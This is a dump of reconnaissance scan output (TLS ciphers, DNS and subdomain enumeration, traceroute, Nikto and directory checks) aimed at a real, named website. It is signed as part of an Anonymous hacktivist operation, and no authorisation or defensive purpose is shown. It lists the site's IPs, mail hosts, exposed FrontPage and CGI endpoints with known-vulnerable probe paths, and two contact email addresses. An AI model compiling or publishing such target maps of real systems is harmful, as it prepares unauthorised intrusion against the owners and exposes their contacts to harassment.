  725. Version: 1.11.11-static
  726. OpenSSL 1.0.2-chacha (1.0.2g-dev)
  727.  
  728. Connected to 207.150.212.85
  729.  
  730. Testing SSL server mississippiwhiteknights.com on port 443 using SNI name mississippiwhiteknights.com
  731.  
  732. TLS Fallback SCSV:
  733. Server supports TLS Fallback SCSV
  734.  
  735. TLS renegotiation:
  736. Secure session renegotiation supported
  737.  
  738. TLS Compression:
  739. Compression disabled
  740.  
  741. Heartbleed:
  742. TLS 1.2 not vulnerable to heartbleed
  743. TLS 1.1 not vulnerable to heartbleed
  744. TLS 1.0 not vulnerable to heartbleed
  745.  
  746. Supported Server Cipher(s):
  747. Preferred TLSv1.2 256 bits ECDHE-RSA-AES256-GCM-SHA384 Curve P-256 DHE 256
  748. Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-SHA384 Curve P-256 DHE 256
  749. Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
  750. Accepted TLSv1.2 256 bits DHE-RSA-AES256-GCM-SHA384 DHE 2048 bits
  751. Accepted TLSv1.2 256 bits DHE-RSA-AES256-SHA256 DHE 2048 bits
  752. Accepted TLSv1.2 256 bits DHE-RSA-AES256-SHA DHE 2048 bits
  753. Accepted TLSv1.2 256 bits DHE-RSA-CAMELLIA256-SHA DHE 2048 bits
  754. Accepted TLSv1.2 256 bits AES256-GCM-SHA384
  755. Accepted TLSv1.2 256 bits AES256-SHA256
  756. Accepted TLSv1.2 256 bits AES256-SHA
  757. Accepted TLSv1.2 256 bits CAMELLIA256-SHA
  758. Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-GCM-SHA256 Curve P-256 DHE 256
  759. Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-SHA256 Curve P-256 DHE 256
  760. Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
  761. Accepted TLSv1.2 128 bits DHE-RSA-AES128-GCM-SHA256 DHE 2048 bits
  762. Accepted TLSv1.2 128 bits DHE-RSA-AES128-SHA256 DHE 2048 bits
  763. Accepted TLSv1.2 128 bits DHE-RSA-AES128-SHA DHE 2048 bits
  764. Accepted TLSv1.2 128 bits DHE-RSA-CAMELLIA128-SHA DHE 2048 bits
  765. Accepted TLSv1.2 128 bits AES128-GCM-SHA256
  766. Accepted TLSv1.2 128 bits AES128-SHA256
  767. Accepted TLSv1.2 128 bits AES128-SHA
  768. Accepted TLSv1.2 128 bits CAMELLIA128-SHA
  769. Preferred TLSv1.1 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
  770. Accepted TLSv1.1 256 bits DHE-RSA-AES256-SHA DHE 2048 bits
  771. Accepted TLSv1.1 256 bits DHE-RSA-CAMELLIA256-SHA DHE 2048 bits
  772. Accepted TLSv1.1 256 bits AES256-SHA
  773. Accepted TLSv1.1 256 bits CAMELLIA256-SHA
  774. Accepted TLSv1.1 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
  775. Accepted TLSv1.1 128 bits DHE-RSA-AES128-SHA DHE 2048 bits
  776. Accepted TLSv1.1 128 bits DHE-RSA-CAMELLIA128-SHA DHE 2048 bits
  777. Accepted TLSv1.1 128 bits AES128-SHA
  778. Accepted TLSv1.1 128 bits CAMELLIA128-SHA
  779. Preferred TLSv1.0 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
  780. Accepted TLSv1.0 256 bits DHE-RSA-AES256-SHA DHE 2048 bits
  781. Accepted TLSv1.0 256 bits DHE-RSA-CAMELLIA256-SHA DHE 2048 bits
  782. Accepted TLSv1.0 256 bits AES256-SHA
  783. Accepted TLSv1.0 256 bits CAMELLIA256-SHA
  784. Accepted TLSv1.0 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
  785. Accepted TLSv1.0 128 bits DHE-RSA-AES128-SHA DHE 2048 bits
  786. Accepted TLSv1.0 128 bits DHE-RSA-CAMELLIA128-SHA DHE 2048 bits
  787. Accepted TLSv1.0 128 bits AES128-SHA
  788. Accepted TLSv1.0 128 bits CAMELLIA128-SHA
  789.  
  790. SSL Certificate:
  791. Signature Algorithm: sha256WithRSAEncryption
  792. RSA Key Strength: 2048
  793.  
  794. Subject: *.securedata.net
  795. Altnames: DNS:*.securedata.net, DNS:securedata.net
  796. Issuer: RapidSSL RSA CA 2018
  797.  
  798. Not valid before: Jul 24 00:00:00 2018 GMT
  799. Not valid after: Jul 24 12:00:00 2019 GMT
  800.  
  801. #######################################################################################################################################
  802.  
  803. I, [2018-08-16T23:33:28.460656 #20336] INFO -- : Initiating port scan
  804. I, [2018-08-16T23:34:23.376069 #20336] INFO -- : Using nmap scan output file logs/nmap_output_2018-08-16_23-33-28.xml
  805. I, [2018-08-16T23:34:23.401536 #20336] INFO -- : Discovered open port: 207.150.212.85:80
  806. I, [2018-08-16T23:34:25.197384 #20336] INFO -- : Discovered open port: 207.150.212.85:443
  807. W, [2018-08-16T23:34:28.671206 #20336] WARN -- : Yasuo did not find any potential hosts to
  808. #######################################################################################################################################
  809. [*] Performing General Enumeration of Domain: mississippiwhiteknights.com
  810. [-] DNSSEC is not configured for mississippiwhiteknights.com
  811. [*] SOA adns.cs.siteprotect.com 64.41.112.12
  812. [*] NS adns.cs.siteprotect.com 64.41.112.12
  813. [*] Bind Version for 64.41.112.12 Served by PowerDNS - https://www.powerdns.com/
  814. [*] NS bdns.cs.siteprotect.com 64.41.114.12
  815. [*] Bind Version for 64.41.114.12 Served by PowerDNS - https://www.powerdns.com/
  816. [*] A mississippiwhiteknights.com 207.150.212.85
  817. [*] Enumerating SRV Records
  818. [-] No SRV Records Found for mississippiwhiteknights.com
  819. [+] 0 Records Found
  820. #######################################################################################################################################
  821. Ip Address Status Type Domain Name Server
  822. ---------- ------ ---- ----------- ------
  823. 207.150.212.85 200 host ftp.mississippiwhiteknights.com Apache
  824. 64.26.60.153 host mail.mississippiwhiteknights.com
  825. 64.26.60.229 host pop.mississippiwhiteknights.com
  826. 64.26.60.229 host smtp.mississippiwhiteknights.com
  827. 207.150.212.85 200 host www.mississippiwhiteknights.com Apache
  828. ####################################################################################################################################### =======================================================================================================================================
  829. Hosts 5
  830. DNS Records 5
  831. Subdomains 5
  832.  
  833. Hosts (5)
  834. =======================================================================================================================================
  835. 64.26.60.153
  836. 64.26.60.229
  837. 64.41.112.12
  838. 64.41.114.12
  839. 207.150.212.85
  840.  
  841. DNS Records (5)
  842. =======================================================================================================================================
  843. mississippiwhiteknights.com A 207.150.212.85
  844. mail.mississippiwhiteknights.com MX 64.26.60.153
  845. adns.cs.siteprotect.com NS 64.41.112.12
  846. bdns.cs.siteprotect.com NS 64.41.114.12
  847. adns.cs.siteprotect.com SOA 64.41.112.12
  848.  
  849. Subdomains (5)
  850. =======================================================================================================================================
  851. ftp.mississippiwhiteknights.com 207.150.212.85
  852. mail.mississippiwhiteknights.com 64.26.60.153
  853. pop.mississippiwhiteknights.com 64.26.60.229
  854. smtp.mississippiwhiteknights.com 64.26.60.229
  855. www.mississippiwhiteknights.com 207.150.212.85
  856.  
  857. Loadbalancing
  858. =======================================================================================================================================
  859. Checking for DNS-Loadbalancing:
  860. NOT FOUND
  861.  
  862. Checking for HTTP-Loadbalancing [Server]:
  863. Apache
  864. NOT FOUND
  865.  
  866. Checking for HTTP-Loadbalancing [Date]:
  867. 04:17:01, 04:17:02, 04:17:04, 04:17:05, 04:17:07, 04:17:08, 04:17:09, 04:17:11, 04:17:12, 04:17:14,
  868. 04:17:16, 04:17:17, 04:17:18, 04:17:20, 04:17:21, 04:17:23, 04:17:24, 04:17:26, 04:17:27, 04:17:29,
  869. 04:17:30, 04:17:32, 04:17:33, 04:17:35, 04:17:36, 04:17:38, 04:17:39, 04:17:41, 04:17:42, 04:17:44,
  870. 04:17:45, 04:17:47, 04:17:48, 04:17:50, 04:17:51, 04:17:53, 04:17:54, 04:17:55, 04:17:57, 04:17:58,
  871. 04:18:00, 04:18:01, 04:18:03, 04:18:04, 04:18:06, 04:18:07, 04:18:09, 04:18:10, 04:18:12, 04:18:13,
  872. NOT FOUND
  873.  
  874. Checking for HTTP-Loadbalancing [Diff]:
  875. NOT FOUND
  876.  
  877.  
  878. Web Application Firewall
  879. =======================================================================================================================================
  880. No WAF detected by the generic detection
  881.  
  882. Traceroute
  883. =======================================================================================================================================
  884.  
  885. ICMP ECHO
  886. 1 public-gw.vpngate.net (10.211.254.254)
  887. 2 192.168.1.1 (192.168.1.1)
  888. 3 fp96f9b601.tkyc403.ap.nuro.jp (150.249.182.1)
  889. 4 118.238.196.48 (118.238.196.48)
  890. 5 39.110.253.217 (39.110.253.217)
  891. 6 202.213.194.33 (202.213.194.33)
  892. 7 ae-4.a01.tokyjp05.jp.bb.gin.ntt.net (120.88.53.9)
  893. 8 ae-24.r03.tokyjp05.jp.bb.gin.ntt.net (129.250.6.83)
  894. 9 * *
  895. 10 ae-1-12.bar2.Tampa1.Level3.net (4.69.137.117)
  896. 11 level3.co1.as30217.net (4.71.0.30)
  897. 12 * *
  898. 13 * *
  899. 14 207.150.212.85 (207.150.212.85)
  900.  
  901. TCP SYN
  902. 1 207.150.212.85 (207.150.212.85)
  903.  
  904. Zone Transfer
  905. =======================================================================================================================================
  906. Resolving SOA Record
  907. SOA adns.cs.siteprotect.com 64.41.112.12
  908. Resolving NS Records
  909. NS bdns.cs.siteprotect.com 64.41.114.12
  910. NS adns.cs.siteprotect.com 64.41.112.12
  911.  
  912. Trying NS server 64.41.114.12
  913. No answer or RRset not for qname
  914.  
  915. Trying NS server 64.41.112.12
  916. No answer or RRset not for qname
  917.  
  918. Whatweb
  919. =======================================================================================================================================
  920. ftp.mississippiwhiteknights.com [200 OK] Apache
  921. HTTPServer[Apache]
  922. IP[207.150.212.85]
  923. Title[Temporarily Disabled]
  924.  
  925. mail.mississippiwhiteknights.com [ Unassigned]
  926.  
  927. pop.mississippiwhiteknights.com [ Unassigned]
  928.  
  929. smtp.mississippiwhiteknights.com [ Unassigned]
  930.  
  931. www.mississippiwhiteknights.com [200 OK] ActiveX[D27CDB6E-AE6D-11cf-96B8-444553540000]
  932. Adobe-Flash
  933. Apache
  934. HTTPServer[Apache]
  935. IP[207.150.212.85]
  936. MetaGenerator[Microsoft FrontPage 5.0]
  937. Object[download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=5
  938. 0
  939. 2
  940. 0][clsid:D27CDB6E-AE6D-11cf-96B8-444553540000]
  941.  
  942. #######################################################################################################################################
  943. ---------------------------------------------------------------------------------------------------------------------------------------
  944. + Target IP: 207.150.212.85
  945. + Target Hostname: mississippiwhiteknights.com
  946. + Target Port: 80
  947. + Start Time: 2018-08-16 23:29:32 (GMT-4)
  948. ---------------------------------------------------------------------------------------------------------------------------------------
  949. + Server: Apache
  950. + Server leaks inodes via ETags, header found with file /, fields: 0x40c 0x440a6df015d40
  951. + The anti-clickjacking X-Frame-Options header is not present.
  952. + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
  953. + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
  954. + "robots.txt" contains 1 entry which should be manually viewed.
  955. + Allowed HTTP Methods: POST, OPTIONS, GET, HEAD
  956. + OSVDB-396: /_vti_bin/shtml.exe: Attackers may be able to crash FrontPage by requesting a DOS device, like shtml.exe/aux.htm -- a DoS was not attempted.
  957. + OSVDB-28260: /_vti_bin/shtml.exe/_vti_rpc?method=server+version%3a4%2e0%2e2%2e2611: Gives info about server settings.
  958. + OSVDB-3233: /postinfo.html: Microsoft FrontPage default file found.
  959. + OSVDB-3092: /stats/: This might be interesting...
  960. + OSVDB-3092: /test.htm: This might be interesting...
  961. + OSVDB-3092: /test.html: This might be interesting...
  962. + OSVDB-3093: /cgi.cgi/_vti_bin/fpcount.exe?Page=default.htm|Image=3|Digits=15: This might be interesting... has been seen in web logs from an unknown scanner.
  963. + OSVDB-3093: /webcgi/_vti_bin/fpcount.exe?Page=default.htm|Image=3|Digits=15: This might be interesting... has been seen in web logs from an unknown scanner.
  964. + OSVDB-3093: /cgi-914/_vti_bin/fpcount.exe?Page=default.htm|Image=3|Digits=15: This might be interesting... has been seen in web logs from an unknown scanner.
  965. + OSVDB-3093: /cgi-915/_vti_bin/fpcount.exe?Page=default.htm|Image=3|Digits=15: This might be interesting... has been seen in web logs from an unknown scanner.
  966. + OSVDB-3093: /bin/_vti_bin/fpcount.exe?Page=default.htm|Image=3|Digits=15: This might be interesting... has been seen in web logs from an unknown scanner.
  967. + OSVDB-3093: /cgi/_vti_bin/fpcount.exe?Page=default.htm|Image=3|Digits=15: This might be interesting... has been seen in web logs from an unknown scanner.
  968. + OSVDB-3093: /mpcgi/_vti_bin/fpcount.exe?Page=default.htm|Image=3|Digits=15: This might be interesting... has been seen in web logs from an unknown scanner.
  969. + OSVDB-3093: /ows-bin/_vti_bin/fpcount.exe?Page=default.htm|Image=3|Digits=15: This might be interesting... has been seen in web logs from an unknown scanner.
  970. + OSVDB-3093: /cgi-sys/_vti_bin/fpcount.exe?Page=default.htm|Image=3|Digits=15: This might be interesting... has been seen in web logs from an unknown scanner.
  971. + OSVDB-3093: /cgi-local/_vti_bin/fpcount.exe?Page=default.htm|Image=3|Digits=15: This might be interesting... has been seen in web logs from an unknown scanner.
  972. + OSVDB-3093: /htbin/_vti_bin/fpcount.exe?Page=default.htm|Image=3|Digits=15: This might be interesting... has been seen in web logs from an unknown scanner.
  973. + OSVDB-3093: /cgibin/_vti_bin/fpcount.exe?Page=default.htm|Image=3|Digits=15: This might be interesting... has been seen in web logs from an unknown scanner.
  974. + OSVDB-3093: /cgis/_vti_bin/fpcount.exe?Page=default.htm|Image=3|Digits=15: This might be interesting... has been seen in web logs from an unknown scanner.
  975. + OSVDB-3093: /scripts/_vti_bin/fpcount.exe?Page=default.htm|Image=3|Digits=15: This might be interesting... has been seen in web logs from an unknown scanner.
  976. + OSVDB-3093: /cgi-win/_vti_bin/fpcount.exe?Page=default.htm|Image=3|Digits=15: This might be interesting... has been seen in web logs from an unknown scanner.
  977. + OSVDB-3093: /fcgi-bin/_vti_bin/fpcount.exe?Page=default.htm|Image=3|Digits=15: This might be interesting... has been seen in web logs from an unknown scanner.
  978. + OSVDB-3093: /cgi-exe/_vti_bin/fpcount.exe?Page=default.htm|Image=3|Digits=15: This might be interesting... has been seen in web logs from an unknown scanner.
  979. + OSVDB-3093: /cgi-home/_vti_bin/fpcount.exe?Page=default.htm|Image=3|Digits=15: This might be interesting... has been seen in web logs from an unknown scanner.
  980. + OSVDB-3093: /cgi-perl/_vti_bin/fpcount.exe?Page=default.htm|Image=3|Digits=15: This might be interesting... has been seen in web logs from an unknown scanner.
  981. + OSVDB-3093: /scgi-bin/_vti_bin/fpcount.exe?Page=default.htm|Image=3|Digits=15: This might be interesting... has been seen in web logs from an unknown scanner.
  982. + OSVDB-3093: /cgi-bin-sdb/_vti_bin/fpcount.exe?Page=default.htm|Image=3|Digits=15: This might be interesting... has been seen in web logs from an unknown scanner.
  983. + OSVDB-3093: /cgi-mod/_vti_bin/fpcount.exe?Page=default.htm|Image=3|Digits=15: This might be interesting... has been seen in web logs from an unknown scanner.
  984. + OSVDB-3233: /_vti_bin/shtml.exe/_vti_rpc: FrontPage may be installed.
  985. + OSVDB-3233: /_vti_inf.html: FrontPage/SharePoint is installed and reveals its version number (check HTML source for more information).
  986. + 26228 requests: 0 error(s) and 36 item(s) reported on remote host
  987. + End Time: 2018-08-17 03:33:56 (GMT-4) (14664 seconds)
  988. ---------------------------------------------------------------------------------------------------------------------------------------#######################################################################################################################################
  989. =======================================================================================================================================
  990. | Domain: http://mississippiwhiteknights.com/
  991. | Server: Apache
  992. | IP: 207.150.212.85
  993. =======================================================================================================================================
  994. |
  995. | Directory check:
  996. | [+] CODE: 200 URL: http://mississippiwhiteknights.com/mysite/
  997. | [+] CODE: 200 URL: http://mississippiwhiteknights.com/stats/
  998. =======================================================================================================================================
  999. |
  1000. | File check:
  1001. | [+] CODE: 200 URL: http://mississippiwhiteknights.com/cgi-bin/cgiecho
  1002. | [+] CODE: 200 URL: http://mississippiwhiteknights.com/cgi-bin/cgiemail
  1003. | [+] CODE: 200 URL: http://mississippiwhiteknights.com/index.html
  1004. | [+] CODE: 200 URL: http://mississippiwhiteknights.com/postinfo.html
  1005. | [+] CODE: 200 URL: http://mississippiwhiteknights.com/robots.txt
  1006. | [+] CODE: 200 URL: http://mississippiwhiteknights.com/test.htm
  1007. | [+] CODE: 200 URL: http://mississippiwhiteknights.com/test.html
  1008. | [+] CODE: 200 URL: http://mississippiwhiteknights.com/_vti_bin/shtml.exe
  1009. | [+] CODE: 200 URL: http://mississippiwhiteknights.com/_vti_bin/shtml.exe/junk_nonexistant.exe
  1010. | [+] CODE: 200 URL: http://mississippiwhiteknights.com/_vti_bin/shtml.exe/_vti_rpc
  1011. | [+] CODE: 200 URL: http://mississippiwhiteknights.com/_vti_inf.html
  1012. ======================================================================================================================================
  1013. #######################################################################################################################################
  1014. | External hosts:
  1015. | [+] External Host Found: http://www.skynetweb.com
  1016. | [+] External Host Found: http://www.winsave.com
  1017. | [+] External Host Found: http://www.affinity.com
  1018. | [+] External Host Found: http://www.hostsave.com
  1019. | [+] External Host Found: http://www.valueweb.com
  1020. |
  1021. | FCKeditor File Upload:
  1022. |
  1023. | File Upload Forms:
  1024. |
  1025. | E-mails:
  1026. | [+] E-mail Found: mswhiteknights@gmail.com
  1027. | [+] E-mail Found: mississippiwhiteknights@gmail.com
  1028. |
  1029. | Timthumb:
  1030. |
  1031. | Ignored Files:
  1032. | http://mississippiwhiteknights.com/pow_files/filelist.xml
  1033. =======================================================================================================================================
  1034. #######################################################################################################################################
  1035. Anonymous JTSEC #OpDomesticTerrorism Full Recon #10